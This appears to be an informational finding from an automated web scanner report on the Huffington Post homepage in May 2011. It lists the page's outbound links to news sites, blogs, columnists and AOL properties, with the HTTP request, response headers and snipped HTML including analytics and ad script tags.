<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
<li><a href="http://www.hitchensweb.com/" target="_blank">Christopher Hitchens</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/lowry/lowry.asp/" target="_blank">Rich Lowry</a>
...[SNIP]...
<li><a href="http://www.thenation.com/blogs/thebeat " target="_blank">John Nichols</a>
...[SNIP]...
<li><a href="http://online.wsj.com/public/page/peggy-noonan.html" target="_blank">Peggy Noonan</a>
...[SNIP]...
<li><a href="http://slate.msn.com/?id=3944&cp=68090&nav=navom" target="_blank">Jack Shafer</a>
...[SNIP]...
<li><a href="http://blogs.suntimes.com/sweet/" target="_blank">Lynn Sweet</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/03/24/LI2005032402294.html" target="_blank">George Will</a>
...[SNIP]...
<li><a href="http://www.newser.com/off-the-grid/author/16/michael-wolff.html" target="_blank">Michael Wolff</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.engadget.com/">ENGADGET</a>
...[SNIP]...
<li><a href="http://sixapart.com">Powered by Movable Type</a>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/p?c1=2&c2=6723616&c3=&c4=&c5=front&c6=&c15=&cj=1" />
</noscript>
...[SNIP]...
<noscript>
<img src="//secure-us.imrworldwide.com/cgi-bin/m?ci=us-703240h&amp;cg=0&amp;cc=1&amp;ts=noscript" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="http://vertical-stats.huffpost.com/?-1&&" width="1" height="1" alt="" />
</noscript>
...[SNIP]...
<noscript>
<img src="//pixel.quantserve.com/pixel/p-6fTutip1SMLM2.gif?labels=Home" style="display:none" height="1" width="1" alt="Quantcast" />
</noscript>

<script type="text/javascript" src="http://pixel.quantserve.com/seg/p-6fTutip1SMLM2.js"></script>
...[SNIP]...
<a href="#" class="close_modal" onclick="Modal.hideMask('hp_vertical_common_lightbox');return false;">
           <img width="70" height="22" alt="" src="http://s.huffpost.com/images/modal/close-home.gif" />
        </a>
...[SNIP]...
</script>

<script src='http://ads.pubmatic.com/AdServer/js/universalpixel.js' type='text/javascript'></script>
...[SNIP]...

16.87. http://www.huffingtonpost.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.huffingtonpost.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:
  • http://www.huffingtonpost.com/?icid=navbar_huffpo_main5
The response contains the following links to other domains:

Request

GET /?icid=navbar_huffpo_main5 HTTP/1.1
Host: www.huffingtonpost.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/2.2.8 (Unix)
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Cache-Control: max-age=6
Date: Thu, 05 May 2011 00:58:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 268850

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
<link rel="shortcut icon" href="/favicon.ico" />


       <link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=fonts%2Fhelvetica%2Fstylesheet.css%2Chp_modules%2Ftop_nav.css%2Cverticals%2Fhomepage.css%2Cfrontpage.css%2Cbasic.css%2Call_pages.css%2Cverticals%2Fcolor_scheme.css%2Cadd%2Ffront.css%2Cbuttons.css%2Cmost_popular.css&amp;v46770" type="text/css" media="screen" /><link rel="stylesheet" href="http://s.huffpost.com/assets/css.php?f=commercial.css%2Csnp_friends.css%2Csnn-header.css%2Chp_modules%2Fmodule.splash_slideshow.css%2Chp_modules%2Fmodule.apps_feeds.css%2Chufflists.css%2Csignup_modal.css%2Cdirect_message.css%2Cbadges_v2.css%2Chp_modules%2Ffacebook.css%2Cuser_levels.css%2Ctwitter_splash.css%2Cbing.css%2Cgrouping.css%2Cmodal_frames.css%2Chp_modules%2Fmodule.bubble.css%2Cemail_share.css&amp;v46755" type="text/css" media="screen" />                
       
<link rel="alternate" type="application/rss+xml" title="The Full Feed" href="http://feeds.huffingtonpost.com/huffingtonpost/raw_feed" />
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="Wire Services" href="http://www.huffingtonpost.com/wires/full_index.rdf" />
       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=yui.js%2Cjquery.js" ></script>

       <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=huff.js%2Chp_config.js%2Chp_app.js%2Chp_plugins_default.js%2Chp_plugins_default_yui.js%2Chp_init.js%2Cjquery%2Fjquery.backgroundPosition.js%2Cflashobjectmin.js%2Cjsonmin.js%2Ccookiesmin.js%2Cv%2Fblogroll.js%2Chp_track.js%2Chp_util.js%2Cjquery%2Fcolor.jquery.js%2Chp_browser.js%2Ccommon.js%2Clightboxes.js%2Cjquery%2Fjquery.jdMenu.js%2Cprovider.js%2Cquickview.js%2Cshare.js%2Cposts.js%2Crefresh.js%2Cmost_popular.js%2Cfacebook.js%2Cgeopromo.js%2Csnproject.js%2Clazyload-min.js%2Csnn_module.js%2Cuser.js%2Chp_message.js%2Cbalance_columns.js%2Csocial_friends.js%2Cuser%2Frecommendations.js%2Csitemode.js%2Cmobile%2Fiphone.js%2Cmobile%2Fandroid.js%2Csplash_slideshow.js%2Cmodal_window.js%2Cpopup_manager.js%2Cbadges_v2.js%2Cuser_levels.js%2Ctwitter_splash.js%2Csharer.js%2Chuffconnect.js%2Cconnect_overview.js%2Cbing.js%2Chptwitter_anywhere.js%2Ctwitter%2Ffrontpage.js%2Chptwitter.js%2Capp-feeds.js&amp;v47007"></script>
...[SNIP]...
</script>
   <script type="text/javascript" src="http://s.huffpost.com/assets/js.php?f=v.js&amp;v47014"></script>

<!-- core ad call for AOL AdTech -->
<script type="text/javascript" src="http://o.aolcdn.com/ads/adsWrapper.js"></script>
...[SNIP]...
<h1>Using a mobile device? Go to <a href="http://m.huffpost.com">m.huffpost.com</a>
...[SNIP]...
<div class="huffpo_logo_lightbox">
                           <img src="http://s.huffpost.com/images/social-profile/lightbox/huffpo_logo_lightbox_beta.png" width="368" height="36" alt="" />
                       </div>
...[SNIP]...
<div id="huffpo_snn_is_loading" style="width:100%; text-align:center;"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div id="qr_tab_read_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<div id="qr_tab_news_col1" class="column first">
<img class="spinner" alt="" src="http://s.huffpost.com/images/quickview/gear_animation.gif" width="32" height="32" />
</div>
...[SNIP]...
<!--
   
       
-->        
           <img src="http://s.huffpost.com/images/v/logos/logo_homepage_hp.gif?nv3" alt="The Huffington Post" width="660" height="70" />
       
<!--            
       
-->
...[SNIP]...
<li class="center" style="border-right:medium none; width:138px;">
                   <a href="http://www.autoblog.com/" class="black border_dotted_ccc">AUTOBLOG</a>
...[SNIP]...
</a>
                   <a href="http://music.aol.com/" class="black border_dotted_ccc">MUSIC</a>
                   <a href="http://www.popeater.com/" class="black">POPEATER</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:115px;">
                   <a href="http://moviefone.com/" class="black border_dotted_ccc">MOVIEFONE</a>
                   <a href="http://television.aol.com/" class="black border_dotted_ccc">TV</a>
                   <a href="http://video.aol.com/" class="black">VIDEO</a>
...[SNIP]...
</a>
                   <a href="http://www.engadget.com/" class="black border_dotted_ccc">ENGADGET</a>
                   <a href="http://www.tuaw.com/" class="black">APPLE BLOG</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:120px;">
                   <a href="http://techcrunch.com/" class="black border_dotted_ccc">TECHCRUNCH</a>
                   <a href="http://www.joystiq.com/" class="black border_dotted_ccc">JOYSTIQ</a>
                   <a href="http://translogic.aolautos.com/" class="black">TRANSLOGIC</a>
...[SNIP]...
</a>
                   <a href="http://www.comicsalliance.com/" class="black">COMICS</a>
...[SNIP]...
</a>
                   <a href="http://www.mmafighting.com/" class="black">MMA FIGHTING</a>
...[SNIP]...
</a>
                   <a href="http://www.shelterpop.com/" class="black">HOME/DIY</a>
...[SNIP]...
<li class="center" style="border-right:medium none; width:90px;">
                   <a href="http://www.stylelist.com/" class="black border_dotted_ccc">STYLELIST</a>
...[SNIP]...
</a>
                   <a href="http://www.kitchendaily.com" class="black">RECIPES</a>
...[SNIP]...
</a>
                   <a href="http://www.patch.com/" class="black border_dotted_ccc">PATCH</a>
                   <a href="http://www.mapquest.com/" class="black">MAPQUEST</a>
...[SNIP]...
<li class="n_default"><a href="http://www.games.com/">GAMES</a>
...[SNIP]...
<li class="n_default"><a href="http://www.techcrunch.com">TECHCRUNCH</a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/osama-bin-laden-pictures_n_857568.html" id="entry_id_0" >
                           
                                                                                   <img id="headline_image" class="quickread_link" width="900" height="350" src="http://i.huffpost.com/gen/273980/thumbs/r-BARACK-OBAMA-OSAMA-BIN-LADEN-huge.jpg" />
                                                                                                   </a>
...[SNIP]...
<a href="#" onclick="javascript:window.external.AddToFavoritesBar('http://www.huffingtonpost.com/webslices/?v=home#home_slice', 'Home', 'slice');">
       <img src="http://s.huffpost.com/images/webslice12x12.png" width="12" height="12" alt="IE8 Web Slice" />
   </a>
...[SNIP]...
<div class="float_left" style="width:45px; height:31px; margin:0 5px;"><img src="http://s.huffpost.com/images/v/blog_column.png" width="44" height="31" /></div>
...[SNIP]...
<a href="/arianna-huffington"><img src="http://s.huffpost.com/contributors/arianna-huffington/headshot.jpg" width="45" height="45" alt="Arianna Huffington" /></a>
...[SNIP]...
<h4><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink">Photos Show 3 Dead Men At Bin Laden Compound (GRAPHIC)</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"><img class="unloaded-image quickread_link" id="image_857719" longdesc="http://i.huffpost.com/gen/273951/thumbs/s-OSAMA-BIN-LADEN-PHOTOS-large300.jpg" alt="Osama Bin Laden Photos" width="300" height="21
...[SNIP]...
<h4 class="subhead"><a href="http://www.reuters.com/subjects/bin-laden-compound" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/administration-bin-laden-waterboarding_n_857529.html"><a href="http://www.nytimes.com/2011/05/04/us/politics/04torture.html"><em>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/william-h-mcraven-univers_n_857584.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<span class="afb-icon">
       <img class="apps-feeds_image" alt="Facebook" src="http://s.huffpost.com/images/blank.gif"/>
    </span>
...[SNIP]...
<span class="afb-icon">
                   <img class="apps-feeds_image" alt="Twitter" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<span class="afb-icon" >
       <img class="apps-feeds_image" alt="Apple" src="http://s.huffpost.com/images/blank.gif"/>
               </span>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Android');" href="/p/huffingtonpost-android-ap.html" target="_blank">
       <img class="apps-feeds_image" alt="Android" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<li id="af-blackberry" class="apps-feeds_button">
    <a class="afb-icon" onclick="HPTrack.Module('follow').click('Blackberry');" href="http://appworld.blackberry.com/webstore/content/19143" target="_blank">
       <img class="apps-feeds_image" alt="Blackberry" src="http://s.huffpost.com/images/blank.gif"/>
       </a>
...[SNIP]...
<a class="afb-icon" href="/subscription/" onclick="HPTrack.Module('follow').click('Email'); QuickSubscribeUser.pop2(); return false;" target="_blank">
                   <img class="apps-feeds_image" alt="Email" src="http://s.huffpost.com/images/blank.gif"/>
               </a>
...[SNIP]...
<a class="afb-icon" onclick="HPTrack.Module('follow').click('Rss');" href="/syndication/" target="_blank">
       <img class="apps-feeds_image" alt="Rss" src="http://s.huffpost.com/images/blank.gif"/>
    </a>
...[SNIP]...
<a href="#" id="facebook_promo_link"><img src="http://s.huffpost.com/images/facebook_promo_connect.png?3" class="facebook_promo_connect" width="230" height="44" /></a>
...[SNIP]...
<div class="snn_twitter_loading_img"><img width="32" height="32" src="http://s.huffpost.com/images/loader.gif" alt="" /></div>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/royalwedding.aol.com/media/2011/05/pippa10facts_74x58.jpg" alt="" class="img_border unloaded-image" />
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://royalwedding.aol.com/2011/05/02/pippa-middleton-boyfriend-engagement/">AOL Royal Wedding: 10 Things You Should Know About Pippa Middleton</a>
...[SNIP]...
<div class="snp_most_popular_entry_image">
       <a href="http://www.stylelist.com/2011/04/28/swimsuit-tan-line/" class="track_lightbox_quickread" onclick="return QV.pop(this); return false;">
                           <img border="0" src="/images/trans.gif" longdesc="http://www.blogcdn.com/www.stylelist.com/media/2011/04/tan-lines-mara-hoffman-swim-suits-590ssl042711_74x58.jpg" alt="" class="img_border unloa
...[SNIP]...
<div class="snp_most_popular_entry_desc">
       <a class="arial_13 black bold snp_entry_title track_lightbox_quickread" onclick="return QV.pop(this); return false;" href="http://www.stylelist.com/2011/04/28/swimsuit-tan-line/">Stylelist: 9 Sexy Swimsuits With The Most Awkward Tan Line Potential</a>
...[SNIP]...
<a href="#" onclick="SayIt.pop_email_form(); return false;">
           <img src="http://s.huffpost.com/images/v/something_to_say_button.png" width="300" height="58" alt="If you have something to say... Say it on the Huffington Post" />
       </a>
...[SNIP]...
<h4><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink">Drunk British Airways Passenger Reportedly Gropes Flight Attendant</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"><img class="unloaded-image quickread_link" id="image_857316" longdesc="http://i.huffpost.com/gen/274035/thumbs/s-ALCOHOL-large300.jpg" alt="Alcohol" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<h4 class="subhead"><a href="http://news.travel.aol.com/2011/05/04/iurii-chumak-drunk-british-airways-passenger-gropes-flight-att/" target="_hplink"></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/panda-peacock-animal-chase_n_857572.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/unemployment-up-divorce-down_n_857503.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<h4><a href="http://aol.com/video/930944537001" target="_hplink">Proof That Some Dogs Can Talk?</a>
...[SNIP]...
<div class="image_wrapper "><a href="http://aol.com/video/930944537001" target="_hplink"><img class="unloaded-image quickread_link" id="image_857475" longdesc="http://i.huffpost.com/gen/273725/thumbs/s-DOG-large300.jpg" alt="Dog" width="300" height="219" src="/images/trans.gif" />
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/03/mac-os-x-tips-tricks_n_855102.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<a href="http://www.huffingtonpost.com/2011/05/04/jon-stewart-rips-pakistan_n_857329.html"><img src="http://s.huffpost.com/images/hoton_twitter3.png" width="45" height="45" /></a>
...[SNIP]...
<li><a href="http://abcnews.go.com/" target="_blank">ABC</a></li>
<li><a href="http://www.accesshollywood.com" target="_blank">Access Hollywood</a>
...[SNIP]...
<li><a href="http://english.aljazeera.net/" target="_blank">Al Jazeera</a>
...[SNIP]...
<li><a href="http://news.aol.com/" target="_blank">AOL News</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/" target="_blank">The Atlantic</a>
...[SNIP]...
<li><a href="http://news.bbc.co.uk/" target="_blank">BBC</a></li>
<li><a href="http://www.bloomberg.com/" target="_blank">Bloomberg</a></li>
<li><a href="http://www.boston.com/news/globe/" target="_blank">Boston Globe</a>
...[SNIP]...
<li><a href="http://www.c-span.org" target="_blank">C-SPAN</a></li>
<li><a href="http://www.cbsnews.com/" target="_blank">CBS</a></li>
<li><a href="http://www.suntimes.com/" target="_blank">Chicago Sun-Times</a>
...[SNIP]...
<li><a href="http://www.chicagotribune.com/" target="_blank">Chicago Tribune</a>
...[SNIP]...
<li><a href="http://www.csmonitor.com/" target="_blank">Christian Science Monitor</a>
...[SNIP]...
<li><a href="http://www.publicintegrity.org/" target="_blank">Center for Public Integrity</a>
...[SNIP]...
<li><a href="http://www.cnn.com/" target="_blank">CNN</a></li>
<li><a href="http://www.cq.com" target="_blank">Congressional Quarterly</a>
...[SNIP]...
<li><a href="http://www.telegraph.co.uk/" target="_blank">Daily Telegraph</a>
...[SNIP]...
<li><a href="http://www.democracynow.org/" target="_blank">Democracy Now!</a>
...[SNIP]...
<li><a href="http://drudgereport.com/" target="_blank">Drudge Report</a>
...[SNIP]...
<li><a href="http://www.eonline.com/" target="_blank">E! Online</a></li>
<li><a href="http://www.ew.com/" target="_blank">Entertainment Weekly</a>
...[SNIP]...
<li><a href="http://www.forbes.com/" target="_blank">Forbes</a></li>
<li><a href="http://money.cnn.com/magazines/fortune/" target="_blank">Fortune</a>
...[SNIP]...
<li><a href="http://www.foxnews.com/" target="_blank">Fox News</a></li>
<li><a href="http://news.ft.com/home/us" target="_blank">Financial Times</a>
...[SNIP]...
<li><a href="http://www.theglobeandmail.com/" target="_blank">Globe and Mail</a>
...[SNIP]...
<li><a href="http://www.GlobalPost.com" target="_blank">GlobalPost.com</a>
...[SNIP]...
<li><a href="http://www.globalvoicesonline.org/" target="_blank">GlobalVoices</a>
...[SNIP]...
<li><a href="http://news.google.com/" target="_blank">Google News</a>
...[SNIP]...
<li><a href="http://www.guardian.co.uk/" target="_blank">Guardian</a></li>
<li><a href="http://thehill.com/" target="_blank">The Hill</a></li>
<li><a href="http://news.independent.co.uk/" target="_blank">Independent</a>
...[SNIP]...
<li><a href="http://www.latimes.com/" target="_blank">Los Angeles Times</a>
...[SNIP]...
<li><a href="http://www.mcclatchydc.com/" target="_blank">McClatchy</a></li>
<li><a href="http://www.mediaite.com/" target="_blank">Mediaite</a></li>
<li><a href="http://www.linktv.org/mosaic/" target="_blank">Mosaic</a></li>
<li><a href="http://www.motherjones.com/" target="_blank">Mother Jones</a>
...[SNIP]...
<li><a href="http://www.msnbc.msn.com/" target="_blank">MSNBC</a></li>
<li><a href="http://nydailynews.com/" target="_blank">New York Daily News</a>
...[SNIP]...
<li><a href="http://www.observer.com/" target="_blank">New York Observer</a>
...[SNIP]...
<li><a href="http://www.nytimes.com/" target="_blank">New York Times</a>
...[SNIP]...
<li><a href="http://www.npr.org/" target="_blank">NPR</a></li>
<li><a href="http://www.pbs.org/newshour/" target="_blank">PBS NewsHour</a>
...[SNIP]...
<li><a href="http://www.newsweek.com" target="_blank">Newsweek</a></li>
<li><a href="http://www.people.com/people" target="_blank">People</a></li>
<li><a href="http://www.politico.com/" target="_blank">Politico</a></li>
<li><a href="http://www.propublica.org/"target="_blank">ProPublica</a>
...[SNIP]...
<li><a href="http://www.reuters.com/" target="_blank">Reuters</a>
...[SNIP]...
<li><a href="http://www.rollcall.com/" target="_blank">Roll Call</a></li>
<li><a href="http://rollingstone.com" target="_blank">Rolling Stone</a>
...[SNIP]...
<li><a href="http://www.theroot.com" target="_blank">The Root</a></li>
<li><a href="http://www.salon.com/" target="_blank">Salon</a></li>
<li><a href="http://www.sfgate.com/" target="_blank">San Francisco Chronicle</a>
...[SNIP]...
<li><a href="http://www.slate.com/" target="_blank">Slate</a></li>
<li><a href="http://reporting.sunlightfoundation.com/blog/" target="_blank">Sunlight Foundation</a>
...[SNIP]...
<li><a href="http://www.time.com/time/?xid=huffpo-direct" target="_blank">TIME</a></li>
<li><a href="http://www.timesonline.co.uk/section/0,,3,00.html" target="_blank">Times Of London</a>
...[SNIP]...
<li><a href="http://www.tmz.com" target="_blank">TMZ</a></li>
<li><a href="http://www.usatoday.com/" target="_blank">USA Today</a></li>
<li><a href="http://www.vanityfair.com/" target="_blank">Vanity Fair</a>
...[SNIP]...
<li><a href="http://wsj.com/" target="_blank">Wall Street Journal</a>
...[SNIP]...
<li><a href="http://www.washingtonindependent.com/" target="_blank">Washington Independent</a>
...[SNIP]...
<li><a href="http://www.washingtontimes.com/" target="_blank">Washington Times</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/" target="_blank">Washington Post</a>
...[SNIP]...
<li><a href="http://news.yahoo.com/" target="_blank">Yahoo! News</a>
...[SNIP]...
<li><a href=http://www.youthradio.org/>Youth Radio</a>
...[SNIP]...
<li><a href="http://americablog.blogspot.com/" target="_blank">Americablog</a>
...[SNIP]...
<li><a href="http://andrewsullivan.theatlantic.com/" target="_blank">Andrew Sullivan</a>
...[SNIP]...
<li><a href="http://www.bagnewsnotes.com/" target="_blank">BagNewsNotes</a>
...[SNIP]...
<li><a href="http://bloggingheads.tv/" target="_blank">Bloggingheads</a>
...[SNIP]...
<li><a href="http://boingboing.net/" target="_blank">Boing Boing</a>
...[SNIP]...
<li><a href="http://bravenewfilms.org/" target="_blank">Brave New Films</a>
...[SNIP]...
<li><a href="http://www.buzzfeed.com/" target="_blank">BuzzFeed</a></li>
<li><a href="http://www.buzzmachine.com/" target="_blank">BuzzMachine</a>
...[SNIP]...
<li><a href="http://www.nationalreview.com/thecorner/corner.asp" target="_blank">The Corner (National Review)</a>
...[SNIP]...
<li><a href="http://mediamatters.org/blog/" target="_blank">County Fair (Media Matters)</a>
...[SNIP]...
<li><a href="http://www.crooksandliars.com/" target="_blank">Crooks and Liars</a>
...[SNIP]...
<li><a href="http://dailycaller.com/" target="_blank">Daily Caller</a>
...[SNIP]...
<li><a href="http://dailykos.com/" target="_blank">Daily Kos</a></li>
<li><a href="http://www.slate.com/blogs/blogs/weigel/" target="_blank">David Weigel</a>
...[SNIP]...
<li><a href="http://democracyarsenal.org/" target="_blank">Democracy Arsenal</a>
...[SNIP]...
<li><a href="http://blogs.reuters.com/felix-salmon/" target="_blank">Felix Salmon</a>
...[SNIP]...
<li><a href="http://firedoglake.com/" target="_blank">Firedoglake</a>
...[SNIP]...
<li><a href="http://fivethirtyeight.blogs.nytimes.com/" target="_blank">FiveThirtyEight</a>
...[SNIP]...
<li><a href="http://www.FrumForum.com" target="_blank">FrumForum</a></li>
<li><a href="http://www.funnyordie.com/" target="_blank">Funny or Die</a>
...[SNIP]...
<li><a href="http://blogs.abcnews.com/george/" target="_blank">George's Bottom Line (George Stephanopoulos)</a>
...[SNIP]...
<li><a href="http://www.gothamist.com" target="_blank">Gothamist</a></li>
<li><a href="http://hotlineblog.nationaljournal.com/" target="_blank">Hotline On Call (National Journal)</a>
...[SNIP]...
<li><a href="http://digbysblog.blogspot.com/">Hullabaloo</a>
...[SNIP]...
<li><a href="http://www.juancole.com/" target="_blank">Informed Comment</a>
...[SNIP]...
<li><a href="http://www.instapundit.com/" target="_blank">Instapundit</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/james-fallows/" target="_blank">James Fallows</a>
...[SNIP]...
<li><a href="http://www.vanityfair.com/online/wolcott" target="_blank">James Wolcott (Vanity Fair)</a>
...[SNIP]...
<li><a href="http://www.theatlantic.com/joshua-green/" target="_blank">Joshua Green</a>
...[SNIP]...
<li><a href="http://www.newsweek.com/blogs/kausfiles.html" target="_blank">Kausfiles (Newsweek)</a>
...[SNIP]...
<li><a href="http://www.kottke.org/" target="_blank">kottke.org</a>
...[SNIP]...
<li><a href="http://www.kcrw.com/news/programs/lr" target="_blank">Left, Right and Center</a>
...[SNIP]...
<li><a href="http://themoderatevoice.com/" target="_blank">The Moderate Voice</a>
...[SNIP]...
<li><a href="http://www.ndnblog.com" target="_blank">NDN Blog</a></li>
<li><a href="http://www.thenation.com/blogs/notion" target="_blank">The Notion (Nation)</a>
...[SNIP]...
<li><a href="http://www.pandagon.net/" target="_blank">Pandagon</a></li>
<li><a href="http://krugman.blogs.nytimes.com/" target="_blank">Paul Krugman</a>
...[SNIP]...
<li><a href="http://www.washingtonmonthly.com/" target="_blank">Political Animal (Washington Monthly)</a>
...[SNIP]...
<li><a href="http://politicalwire.com/" target="_blank">Political Wire</a>
...[SNIP]...
<li><a href="http://www.rawstory.com" target="_blank">Raw Story</a></li>
<li><a href="http://redstate.com/" target="_blank">Redstate.com</a>
...[SNIP]...
<li><a href="http://www.seeingtheforest.com/" target="_blank">Seeing The Forest</a>
...[SNIP]...
<li><a href="http://time-blog.com/swampland/" target="_blank">Swampland (Time)</a>
...[SNIP]...
<li><a href="http://talkleft.com/" target="_blank">TalkLeft</a></li>
<li><a href="http://www.talkingpointsmemo.com/" target="_blank">Talking Points Memo</a>
...[SNIP]...
<li><a href="http://www.prospect.org/weblog/" target="_blank">Tapped (American Prospect)</a>
...[SNIP]...
<li><a href="http://www.taylormarsh.com/" target="_blank">Taylor Marsh</a>
...[SNIP]...
<li><a href="http://www.thatminoritything.com/" target="_blank">That Minority Thing</a>
...[SNIP]...
<li><a href="http://www.truthdig.com/" target="_blank">Truthdig</a></li>
<li><a href="http://www.thinkprogress.org/" target="_blank">Think Progress</a>
...[SNIP]...
<li><a href="http://www.thismodernworld.com/" target="_blank">This Modern World</a>
...[SNIP]...
<li><a href="http://www.usnews.com/usnews/politics/whispers/whisphome.htm" target="_blank">Washington Whispers (US News & World Report)</a>
...[SNIP]...
<li><a href="http://www.wonkette.com/" target="_blank">Wonkette</a></li>
<li><a href="http://www.theyoungturks.com/" target="_blank">The Young Turks</a>
...[SNIP]...
<li><a href="http://www.thenation.com/authors/eric-alterman" target="_blank">Eric Alterman</a>
...[SNIP]...
<li><a href="http://topics.nytimes.com/top/opinion/editorialsandoped/oped/columnists/davidbrooks/index.html" target="_blank">David Brooks</a>
...[SNIP]...
<li><a href="http://www.nationaljournal.com/columns/political-connections">Ron Brownstein</a>
...[SNIP]...
<li><a href="http://www.observer.com/opinions_conason.asp" target="_blank">Joe Conason</a>
...[SNIP]...
<li><a href="http://www.davidcorn.com" target="_blank">David Corn</a>
...[SNIP]...
<li><a href="http://www.nydailynews.com/topics/Stanley+Crouch" target="_blank">Stanley Crouch</a>
...[SNIP]...
<li><a href="http://www.washingtonpost.com/wp-dyn/content/linkset/2005/04/22/LI2005042201099.html" target="_blank">EJ Dionne</a></li>
<li><a href="http://www.marketwatch.com/News/Story/Story.aspx?column=Jon+Friedman%27s+Media+Web&siteid=mktw&dist=" target="_blank">Jon Friedman</a>
...[SNIP]...
<li><a href="http://www.opinionjournal.com/diary/" target="_blank">John Fund</a></li>
<li><a href="http://www.thedailybeast.com/author/howard-kurtz/" target="_blank">Howard Kurtz</a>
...[SNIP]...
